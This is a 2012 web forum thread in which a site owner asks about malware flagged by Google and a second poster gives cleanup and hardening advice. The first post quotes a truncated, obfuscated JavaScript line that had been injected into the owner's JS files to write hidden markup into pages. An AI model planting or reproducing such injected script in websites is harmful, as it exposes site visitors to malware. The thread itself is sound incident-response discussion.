SitePoint Sponsor

User Tag List

Results 1 to 2 of 2
  1. #1
    SitePoint Addict
    Join Date
    Apr 2010
    Posts
    390
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Does anyone know about this malware georgewkohn or bentley.poststreetdental

    Hi guys my website just been hacked google showing the red (Warning: Something's Not Right Here!
    www.xxxxxxxx.com contains malware. Your computer might catch a virus if you visit this site.)

    stating the site has trying to access these two sites
    http://xxxxxxx.com/direct.php?page=15f48be84d67654d
    http://xxxxxxx.com/direct.php?page=15f48be84d67654d

    Now found alot of my js files to have this code at the bottom when i remove it minimise the amount of error on chrome console inspector element, does anyone know if someone actually opened logged in to my FTP accessed the js files and paste those code into it. or if it is some sort of a program that does wrote that.
    Code:
    var _0x965b=["\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22 ..... \x65"];document[_0x965b[1]](_0x965b[0]);
    At momment i am trying going to every single file and delete that line of code, but I am not sure if it might be something else or if somone has a way of accessing my FTP i've changed the password.

    Any sugestion?

    Do I just delete the code on JS files? or should I look for something else on the server?
    Last edited by Mittineague; Jul 4, 2012 at 15:07.

  2. #2
    Certified Ethical Hacker silver trophybronze trophy dklynn's Avatar
    Join Date
    Feb 2002
    Location
    Auckland
    Posts
    14,672
    Mentioned
    19 Post(s)
    Tagged
    3 Thread(s)
    macaela,

    You have been hacked!

    1. Tighten your security (FTP passwords, cPanel passwords, and carefully check any/all uploaded files!

    2. Check ALL files for this type of nefarious code and eliminate these lines (the entire javascript). Better yet, simply delete all your files and upload from your master copy.

    3. Have your host run maldet scans until it reports NO problems on successive scans.

    My host recommends this series of "precautionary steps" (after recovering from a hack attack):

    * Always use alphanumerical passwords and change the passwords frequently including cpanel password.
    * Keep scripts up to date- You should always keep your scripts updated to the latest stable version. Many new script releases contain security patches so it is very important to always upgrade.
    * Use trusted scripts- Use scripts from trusted developers that have a good track record of maintaining and updating their scripts.
    * Use secure permissions- Never use permissions 777 on folders or 666 on files.
    * Remove stuff you are not using- A very common source for account exploits is abandoned scripts which are not updated. Clients often install scripts for testing and forget about them, which are subsequently exploited and used to hijack the entire hosting account.
    * Disable Anonymous FTP accounts

    Regards,

    DK
    David K. Lynn - Data Koncepts is a long-time WebHostingBuzz (US/UK)
    Client and (unpaid) WHB Ambassador
    mod_rewrite Tutorial Article (setup, config, test & write
    mod_rewrite regex w/sample code) and Code Generator


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •